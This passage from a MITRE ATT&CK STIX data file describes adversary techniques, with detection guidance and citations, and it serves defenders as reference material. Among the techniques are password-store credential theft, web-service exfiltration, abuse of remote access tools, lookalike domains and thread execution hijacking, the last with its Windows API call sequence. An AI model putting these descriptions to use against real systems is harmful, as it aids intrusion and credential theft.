"https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf"}, {"source_name": "Microsoft Detecting Kerberoasting Feb 2018", "description": "Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.", "url": "https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/"}, {"source_name": "Kekeo", "description": "Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.", "url": "https://github.com/gentilkiwi/kekeo"}, {"source_name": "SpectorOps Bifrost Kerberos macOS 2019", "description": "Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost. Retrieved October 6, 2021.", "url": "https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f"}, {"source_name": "Medium Detecting Attempts to Steal Passwords from Memory", "description": "French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.", "url": "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea"}, {"source_name": "Stealthbits Detect PtT 2019", "description": "Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.", "url": "https://blog.stealthbits.com/detect-pass-the-ticket-attacks"}, {"source_name": "macOS kerberos framework MIT", "description": "Massachusetts Institute of Technology. (2007, October 27). Kerberos for Macintosh Preferences Documentation. Retrieved October 6, 2021.", "url": "http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html"}, {"source_name": "MIT ccache", "description": "Massachusetts Institute of Technology. (n.d.). MIT Kerberos Documentation: Credential Cache. Retrieved October 4, 2021.", "url": "https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html"}, {"source_name": "AdSecurity Cracking Kerberos Dec 2015", "description": "Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast \u2013 Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.", "url": "https://adsecurity.org/?p=2293"}, {"source_name": "ADSecurity Detecting Forged Tickets", "description": "Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.", "url": "https://adsecurity.org/?p=1515"}, {"source_name": "Microsoft Kerberos Golden Ticket", "description": "Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.", "url": "https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285"}, {"source_name": "Microsoft Klist", "description": "Microsoft. (2021, March 3). klist. Retrieved October 14, 2021.", "url": "https://docs.microsoft.com/windows-server/administration/windows-commands/klist"}, {"source_name": "ADSecurity Kerberos Ring Decoder", "description": "Sean Metcalf. (2014, September 12). Kerberos, Active Directory\u2019s Secret Decoder Ring. Retrieved February 27, 2020.", "url": "https://adsecurity.org/?p=227"}, {"source_name": "Brining MimiKatz to Unix", "description": "Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.", "url": "https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf"}, {"source_name": "Linux Kerberos Tickets", "description": "Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red Teams. Retrieved October 4, 2021.", "url": "https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-02-26T14:19:09.417Z", "name": "Credentials from Password Stores", "description": "Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor system calls, file read events, and processes for suspicious activity that could indicate searching for a password or other activity related to performing keyword searches (e.g. password, pwd, login, store, secure, credentials, etc.) in process memory for credentials. File read events should be monitored surrounding known password storage applications.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "IaaS"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", "created": "2020-02-11T18:48:28.456Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1555", "external_id": "T1555"}, {"source_name": "F-Secure The Dukes", "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-09-05T15:00:36.471Z", "name": "Exfiltration Over Web Service", "description": "Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.\n\nWeb service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["William Cain"], "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Office 365", "SaaS", "Google Workspace"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", "created": "2020-03-09T12:51:45.570Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1567", "external_id": "T1567"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-12T23:52:30.489Z", "name": "Remote Access Software", "description": "An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)\n\nRemote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary-controlled system.\n \nAdversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.\n\nInstallation of many remote access software may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome\u2019s Remote Desktop).(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Matt Kelly, @breakersall", "Zachary Stanford, @svch0st", "Dray Agha, @Purp1eW0lf, Huntress Labs"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.\n\n[Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "2.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1219", "external_id": "T1219"}, {"source_name": "CrowdStrike 2015 Global Threat Report", "description": "CrowdStrike Intelligence. (2016). 2015 Global Threat Report. Retrieved April 11, 2018.", "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf"}, {"source_name": "CrySyS Blog TeamSpy", "description": "CrySyS Lab. (2013, March 20). TeamSpy \u2013 Obshie manevri. Ispolzovat\u2019 tolko s razreshenija S-a. Retrieved April 11, 2018.", "url": "https://blog.crysys.hu/2013/03/teamspy/"}, {"source_name": "Google Chrome Remote Desktop", "description": "Google. (n.d.). Retrieved March 14, 2024.", "url": "https://support.google.com/chrome/answer/1649523"}, {"source_name": "Chrome Remote Desktop", "description": "Huntress. (n.d.). Retrieved March 14, 2024.", "url": "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"}, {"source_name": "Symantec Living off the Land", "description": "Wueest, C., Anand, H. (2017, July). Living off the land and fileless attack techniques. Retrieved April 10, 2018.", "url": "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:04.582Z", "name": "Unauthorized Command Message", "description": "Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)\n\nIn the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster. (Citation: Zack Whittaker April 2017) (Citation: Benjamin Freed March 2019)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "impair-process-control"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.2", "x_mitre_data_sources": ["Operational Databases: Process History/Live Data", "Application Log: Application Log Content", "Network Traffic: Network Traffic Flow", "Operational Databases: Process/Event Alarm", "Network Traffic: Network Traffic Content"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0855", "external_id": "T0855"}, {"source_name": "Benjamin Freed March 2019", "description": "Benjamin Freed 2019, March 13 Tornado sirens in Dallas suburbs deactivated after being hacked and set off Retrieved. 2020/11/06 ", "url": "https://statescoop.com/tornado-sirens-in-dallas-suburbs-deactivated-after-being-hacked-and-set-off/"}, {"source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"}, {"source_name": "Zack Whittaker April 2017", "description": "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ", "url": "https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-28T15:55:55.068Z", "name": "Domains", "description": "Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.\n\nAdversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute \"IDN homograph attacks,\" creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)\n\nDifferent URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)\n\nAdversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)\n\nDomain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Wes Hurd", "Vinayak Wadhwa, Lucideus", "Deloitte Threat Library Team", "Oleg Kolesnikov, Securonix", "Menachem Goldstein", "Nikola Kovac"], "x_mitre_deprecated": false, "x_mitre_detection": "Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3", "created": "2020-09-30T17:09:31.878Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1583/001", "external_id": "T1583.001"}, {"source_name": "URI Unique", "description": "Australian Cyber Security Centre. National Security Agency. (2020, April 21). Detect and Prevent Web Shell Malware. Retrieved February 9, 2024.", "url": "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF"}, {"source_name": "PaypalScam", "description": "Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI' scam. Retrieved March 2, 2017.", "url": "https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/"}, {"source_name": "CISA IDN ST05-016", "description": "CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020.", "url": "https://us-cert.cisa.gov/ncas/tips/ST05-016"}, {"source_name": "CISA MSS Sep 2020", "description": "CISA. (2020, September 14). Alert (AA20-258A): Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. Retrieved October 1, 2020.", "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-258a"}, {"source_name": "bypass_webproxy_filtering", "description": "Fehrman, B. (2017, April 13). How to Bypass Web-Proxy Filtering. Retrieved September 20, 2019.", "url": "https://www.blackhillsinfosec.com/bypass-web-proxy-filtering/"}, {"source_name": "FireEye APT28", "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", "url": "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf"}, {"source_name": "Domain_Steal_CC", "description": "Krebs, B. (2018, November 13). That Domain You Forgot to Renew? Yeah, it\u2019s Now Stealing Credit Cards. Retrieved September 20, 2019.", "url": "https://krebsonsecurity.com/2018/11/that-domain-you-forgot-to-renew-yeah-its-now-stealing-credit-cards/"}, {"source_name": "tt_obliqueRAT", "description": "Malhotra, A., McKay, K. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal . Retrieved July 29, 2022.", "url": "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html"}, {"source_name": "tt_httrack_fake_domains", "description": "Malhotra, A., Thattil, J. et al. (2022, March 29). Transparent Tribe campaign uses new bespoke malware to target Indian government officials . Retrieved September 6, 2022.", "url": "https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html"}, {"source_name": "Mandiant APT1", "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"}, {"source_name": "Categorisation_not_boundary", "description": "MDSec Research. (2017, July). Categorisation is not a Security Boundary. Retrieved September 20, 2019.", "url": "https://www.mdsec.co.uk/2017/07/categorisation-is-not-a-security-boundary/"}, {"source_name": "URI", "description": "Michael Cobb. (2007, October 11). Preparing for uniform resource identifier (URI) exploits. Retrieved February 9, 2024.", "url": "https://www.techtarget.com/searchsecurity/tip/Preparing-for-uniform-resource-identifier-URI-exploits"}, {"source_name": "Redirectors_Domain_Fronting", "description": "Mudge, R. (2017, February 6). High-reputation Redirectors and Domain Fronting. Retrieved July 11, 2022.", "url": "https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting/"}, {"source_name": "URI Use", "description": "Nathan McFeters. Billy Kim Rios. Rob Carter.. (2008). URI Use and Abuse. Retrieved February 9, 2024.", "url": "https://www.blackhat.com/presentations/bh-dc-08/McFeters-Rios-Carter/Presentation/bh-dc-08-mcfeters-rios-carter.pdf"}, {"source_name": "iOS URL Scheme", "description": "Ostorlab. (n.d.). iOS URL Scheme Hijacking. Retrieved February 9, 2024.", "url": "https://docs.ostorlab.co/kb/IPA_URL_SCHEME_HIJACKING/index.html"}, {"source_name": "lazgroup_idn_phishing", "description": "RISKIQ. (2017, December 20). Mining Insights: Infrastructure Analysis of Lazarus Group Cyber Attacks on the Cryptocurrency Industry. Retrieved July 29, 2022.", "url": "https://web.archive.org/web/20171223000420/https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/"}, {"source_name": "httrack_unhcr", "description": "RISKIQ. (2022, March 15). RiskIQ Threat Intelligence Roundup: Campaigns Targeting Ukraine and Global Malware Infrastructure. Retrieved July 29, 2022.", "url": "https://web.archive.org/web/20220527112908/https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/"}, {"source_name": "ThreatConnect Infrastructure Dec 2020", "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Archive via Library", "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.\n\nSome archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", "created": "2020-02-20T21:08:52.529Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1560/002", "external_id": "T1560.002"}, {"source_name": "PyPI RAR", "description": "mkz. (2020). rarfile 3.1. Retrieved February 20, 2020.", "url": "https://pypi.org/project/rarfile/"}, {"source_name": "libzip", "description": "D. Baron, T. Klausner. (2020). libzip. Retrieved February 20, 2020.", "url": "https://libzip.org/"}, {"source_name": "Zlib Github", "description": "madler. (2017). zlib. Retrieved February 20, 2020.", "url": "https://github.com/madler/zlib"}, {"source_name": "Wikipedia File Header Signatures", "description": "Wikipedia. (2016, March 31). List of file signatures. Retrieved April 22, 2016.", "url": "https://en.wikipedia.org/wiki/List_of_file_signatures"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Thread Execution Hijacking", "description": "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nThread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state. \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application control", "Anti-virus"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6", "created": "2020-01-14T01:28:32.166Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1055/003", "external_id": "T1055.003"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Multilayer Encryption", "description": "An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "If malware uses [Standard Cryptographic Protocol](https://attack.mitre.org/techniques/T1032), SSL/TLS inspection can be used to detect command and control traffic within some encrypted communication channels. (Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation. (Citation: SEI SSL Inspection Risks) After SSL/TLS inspection, additional cryptographic analysis may be needed to analyze the second layer of encryption.\n\nWith [Custom Cryptographic Protocol](https://attack.mitre.org/techniques/T1024), if malware uses encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures. (Citation: Fidelis DarkComet)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--428ca9f8-0e33-442a-be87-f869cb4cf73e", "created": "2017-05-31T21:31:01.315Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1079", "external_id": "T1079"}, {"source_name": "SANS Decrypting SSL", "description": "Butler, M. (2013, November). Finding Hidden Threats by Decrypting SSL. Retrieved April 5, 2016.", "url": "http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840"}, {"source_name": "SEI SSL Inspection Risks", "description": "Dormann, W. (2015, March 13). The Risks of SSL Inspection. Retrieved April 5, 2016.", "url": "https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html"}, {"source_name": "Fidelis DarkComet", "description": "Fidelis Cybersecurity. (2015, August 4). Looking at the Sky for a DarkComet. Retrieved April 5, 2016.", "url": "https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-03-08T17:00:59.133Z", "name": "Masquerading", "description": "Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable 